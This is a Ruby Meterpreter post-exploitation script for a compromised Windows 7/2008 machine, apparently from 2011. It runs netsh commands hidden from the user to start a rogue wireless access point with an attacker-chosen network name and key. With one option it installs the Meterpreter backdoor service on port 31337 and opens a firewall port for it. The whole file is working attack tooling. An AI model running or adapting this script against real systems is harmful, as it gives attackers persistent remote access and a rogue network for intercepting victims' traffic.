# $Id: rogueap.rb 10/8/2011 # email: zitstif[@]gmail.com # website: http://zitstif.no-ip.org/ # name: Kyle Young # Meterpreter script for deploying a rogue soft ap on Windows 7/2008 wireless clients # Inspired by Vivek Ramachandran - Thanks Vivek! You Rock! def usage() print_line("Meterpreter script for deploying a rogue soft ap on Windows 7/2008 wireless clients") print_line("Usage:\trogueap -n NetworkName -k NetworkKey") print_line("OPTIONS:\n") print_line("-h\tThis help menu") print_line("-n\tRequired for setting ssid") print_line("-k\tRequired for setting WPA key") print_line("-S\t[Optional] Deploy Meterpreter Service which listens on port 31337") raise Rex::Script::Completed end @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "This is the help menu"], "-n" => [ true, "Required for setting ssid" ], "-k" => [ true, "Required for setting WPA key" ], "-S" => [ false, "Required for setting WPA key" ] ) def message() print_status("Rogue SoftAP Script by zitstif") print_status("zitstif[@]gmail.com") end networkname = nil networkkey = nil meterservice = nil @@exec_opts.parse(args) { |opt, idx, val| case opt when "-h" usage() when "-n" networkname = val when "-k" networkkey = val when "-S" meterservice = "true" end } if networkname == nil print_error("-n requires an argument! (For example -n PrivateWifi)") raise Rex::Script::Completed end if networkkey == nil print_error("-k requires an argument! (For example -k PrivateKey)") raise Rex::Script::Completed end if networkkey.length < 8 print_error("The network key needs to be at least 8 or more characters in length!") raise Rex::Script::Completed end session = client if !(client.platform =~ /win32|win64/) print_error("This meterpreter script won't work on this system!") raise Rex::Script::Completed end winver = session.sys.config.sysinfo if !(winver["OS"] =~ (/Windows 7|Windows 2008/)) print_error("This version of Windows is not supported!") raise Rex::Script::Completed end message() print_error("Warning! This meterpreter script assumes that you have AT LEAST Administrator privileges") if meterservice == "true" print_status("This rogue ap will be deployed with the Meterpreter Service..") else print_status("This rogue ap will not be deployed with the Meterpreter Service..") end print_status("Soft AP point name: #{networkname}") print_status("AP key: #{networkkey}") begin print_status("Creating AP..") client.sys.process.execute("netsh wlan set hostednetwork mode=allow ssid=#{networkname} key=#{networkkey}", nil, {'Hidden' => 'true', 'Channelized' => true}) print_status("Starting network..") client.sys.process.execute("netsh wlan start hostednetwork", nil, {'Hidden' => 'true', 'Channelized' => true}) rescue print_error("There seemed to be an issue creating the rogue ap point!") print_error("Make sure you have at least Administrator privileges!") raise Rex::Script::Completed end if meterservice == "true" begin print_status("Installing meterpreter service that will listen on port 31337") session.console.run_single("run metsvc") print_status("Opening appropriate port in firewall..") client.sys.process.execute("netsh firewall add portopening tcp 31337 \"metsvc\"", nil, {'Hidden' => 'true', 'Channelized' => true}) rescue print_error("There was an error trying to install the meterpreter service!") print_error("Make sure you have the appropriate privileges.") end end